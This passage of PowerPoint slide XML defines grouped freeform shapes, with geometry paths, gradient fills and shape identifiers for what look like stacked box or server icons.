                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45BF19BA-9ACD-44C6-B895-ED9F1C78BFD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48" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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69" name="Freeform 2233">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{593FFB95-B2EE-4097-B471-B9C327809FE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104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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069" name="Group 2297">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA85053E-1589-40EB-A877-33B058EBA2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39192" y="1217613"/>
              <a:ext cx="2044700" cy="1246187"/>
              <a:chOff x="1250" y="1893"/>
              <a:chExt cx="1288" cy="785"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2613" name="Freeform 1825">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7A72C08-4657-4978-9ED2-6C3A80E7534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50" y="2332"/>
                <a:ext cx="1288" cy="346"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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614" name="Group 1826">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCC352EE-F223-4EAE-AFA2-28B1044F3C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5" y="1893"/>
                <a:ext cx="642" cy="618"/>
                <a:chOff x="2634" y="1684"/>
                <a:chExt cx="1298" cy="1247"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2654" name="Freeform 1827">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0EBB95-991B-4F0F-B82B-7D7FF327F82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34" y="1684"/>
                  <a:ext cx="1298" cy="1247"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 258 w 1535"/>
                    <a:gd name="T1" fmla="*/ 0 h 1472"/>
                    <a:gd name="T2" fmla="*/ 0 w 1535"/>
                    <a:gd name="T3" fmla="*/ 69 h 1472"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 1131 h 1472"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 1472 h 1472"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T9" fmla="*/ 411 h 1472"/>
                    <a:gd name="T10" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T11" fmla="*/ 343 h 1472"/>
                    <a:gd name="T12" fmla="*/ 258 w 1535"/>
                    <a:gd name="T13" fmla="*/ 0 h 14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35" h="1472">
                      <a:moveTo>
                        <a:pt x="258" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="1472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6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655" name="Freeform 1828">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208C6972-78EC-4640-8CF9-83C79C538C0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34" y="2553"/>
                  <a:ext cx="1298" cy="348"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 342 h 410"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 410"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 410"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 410 h 410"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 342 h 4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5" h="410">
                      <a:moveTo>
                        <a:pt x="1535" y="342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="410"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="342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656" name="Freeform 1829">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A86EAB8-59DA-49E0-98F4-115923EC6F1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34" y="2331"/>
                  <a:ext cx="1298" cy="348"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 342 h 411"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 411"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 69 h 411"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 411 h 411"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 342 h 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5" h="411">
                      <a:moveTo>
                        <a:pt x="1535" y="342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="342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657" name="Freeform 1830">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76B99450-BAFE-4962-A2CC-7210B3D8C10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34" y="2104"/>
                  <a:ext cx="1298" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 343 h 411"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 411"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 69 h 411"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 411 h 411"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 343 h 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5" h="411">
                      <a:moveTo>
                        <a:pt x="1535" y="343"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="343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658" name="Freeform 1831">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B233012-8D1B-41E3-86ED-E3FD7D4E812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34" y="1879"/>
                  <a:ext cx="1298" cy="348"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 340 h 408"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 408"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 408"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 408 h 408"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 340 h 4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5" h="408">
                      <a:moveTo>
                        <a:pt x="1535" y="340"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="408"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="340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2659" name="Group 1832">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D826856E-0F74-4AE0-A411-F0630E32E2E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4" y="1741"/>
                  <a:ext cx="1082" cy="1190"/>
                  <a:chOff x="4616" y="1681"/>
                  <a:chExt cx="361" cy="397"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2661" name="Freeform 1833">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3ADC9E3-4D77-4829-B903-427DE6F90D9B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gray">
                  <a:xfrm>
                    <a:off x="4616" y="1906"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 264 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 342 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 566 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 240 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 42 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 368 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 368 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 566 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="566"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="240"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="42"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="368"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="368"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="566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62" name="Freeform 1834">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00A5AF32-F6E7-4168-8269-B30DA616C3C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gray">
                  <a:xfrm>
                    <a:off x="4616" y="1831"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 265 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 343 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 565 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 43 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 565 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="565"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="565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63" name="Freeform 1835">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99BA9C56-C0B4-44FA-9423-7EFBA3C4E53C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gray">
                  <a:xfrm>
                    <a:off x="4616" y="1756"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 265 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 343 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 567 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 43 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 567 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="567"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="567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64" name="Freeform 1836">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D53F38B-2803-4CA0-810D-6F474A4BD3CE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gray">
                  <a:xfrm>
                    <a:off x="4616" y="1681"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 264 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 342 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 564 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 40 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 564 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="564"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="564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60" name="Freeform 1837">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA83F83-7C41-4C4D-9CB9-8F3F65485AA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716" y="1975"/>
                  <a:ext cx="216" cy="956"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 255"/>
                    <a:gd name="T1" fmla="*/ 68 h 1129"/>
                    <a:gd name="T2" fmla="*/ 0 w 255"/>
                    <a:gd name="T3" fmla="*/ 333 h 1129"/>
                    <a:gd name="T4" fmla="*/ 0 w 255"/>
                    <a:gd name="T5" fmla="*/ 373 h 1129"/>
                    <a:gd name="T6" fmla="*/ 0 w 255"/>
                    <a:gd name="T7" fmla="*/ 564 h 1129"/>
                    <a:gd name="T8" fmla="*/ 0 w 255"/>
                    <a:gd name="T9" fmla="*/ 597 h 1129"/>
                    <a:gd name="T10" fmla="*/ 0 w 255"/>
                    <a:gd name="T11" fmla="*/ 864 h 1129"/>
                    <a:gd name="T12" fmla="*/ 0 w 255"/>
                    <a:gd name="T13" fmla="*/ 897 h 1129"/>
                    <a:gd name="T14" fmla="*/ 0 w 255"/>
                    <a:gd name="T15" fmla="*/ 1129 h 1129"/>
                    <a:gd name="T16" fmla="*/ 255 w 255"/>
                    <a:gd name="T17" fmla="*/ 1060 h 1129"/>
                    <a:gd name="T18" fmla="*/ 255 w 255"/>
                    <a:gd name="T19" fmla="*/ 829 h 1129"/>
                    <a:gd name="T20" fmla="*/ 255 w 255"/>
                    <a:gd name="T21" fmla="*/ 796 h 1129"/>
                    <a:gd name="T22" fmla="*/ 255 w 255"/>
                    <a:gd name="T23" fmla="*/ 529 h 1129"/>
                    <a:gd name="T24" fmla="*/ 255 w 255"/>
                    <a:gd name="T25" fmla="*/ 496 h 1129"/>
                    <a:gd name="T26" fmla="*/ 255 w 255"/>
                    <a:gd name="T27" fmla="*/ 304 h 1129"/>
                    <a:gd name="T28" fmla="*/ 255 w 255"/>
                    <a:gd name="T29" fmla="*/ 264 h 1129"/>
                    <a:gd name="T30" fmla="*/ 255 w 255"/>
                    <a:gd name="T31" fmla="*/ 0 h 1129"/>
                    <a:gd name="T32" fmla="*/ 0 w 255"/>
                    <a:gd name="T33" fmla="*/ 68 h 1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55" h="1129">
                      <a:moveTo>
                        <a:pt x="0" y="68"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="333"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="564"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="597"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="864"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="897"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1129"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="1060"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="496"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="264"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="8282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615" name="Group 1838">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C30AFE-39EA-4A26-8D01-3486B9276C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66" y="2252"/>
                <a:ext cx="429" cy="262"/>
                <a:chOff x="1366" y="2294"/>
                <a:chExt cx="429" cy="262"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="2626" name="Group 1839">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D63989-7793-4B67-AE88-8395D7F24C1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21600000">
                  <a:off x="1366" y="2327"/>
                  <a:ext cx="429" cy="229"/>
                  <a:chOff x="786" y="2382"/>
                  <a:chExt cx="1190" cy="634"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2642" name="Freeform 1840">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1754E5A-FE59-4243-B0F9-641CF98AEF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933" y="2464"/>
                    <a:ext cx="43" cy="322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43" name="Freeform 1841">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FD5971B-8EA8-4076-A151-FEF905E92F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888" y="2464"/>
                    <a:ext cx="45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3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44" name="Freeform 1842">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FF4F24-0220-48F6-9D7F-DB36A2783B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038" y="2694"/>
                    <a:ext cx="46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4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4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45" name="Freeform 1843">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAFBF7C0-A10C-4F71-A5E3-318EBA4AC7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084" y="2694"/>
                    <a:ext cx="42" cy="322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4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46" name="Freeform 1844">
                    <a:extLst>
